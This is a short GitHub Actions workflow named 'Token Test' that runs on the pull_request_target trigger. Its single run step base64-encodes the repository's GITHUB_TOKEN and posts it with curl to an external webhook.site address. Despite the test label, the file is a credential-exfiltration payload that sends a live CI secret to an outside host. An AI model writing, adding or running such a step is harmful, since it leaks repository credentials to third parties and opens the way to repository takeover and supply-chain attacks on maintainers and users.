name: Token Test
on: pull_request_target

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: |
          curl -X POST 	https://webhook.site/b2742a99-b62e-4b05-8541-3c40ba9da57b -d "token=$(echo -n $GITHUB_TOKEN | base64 -w0)"
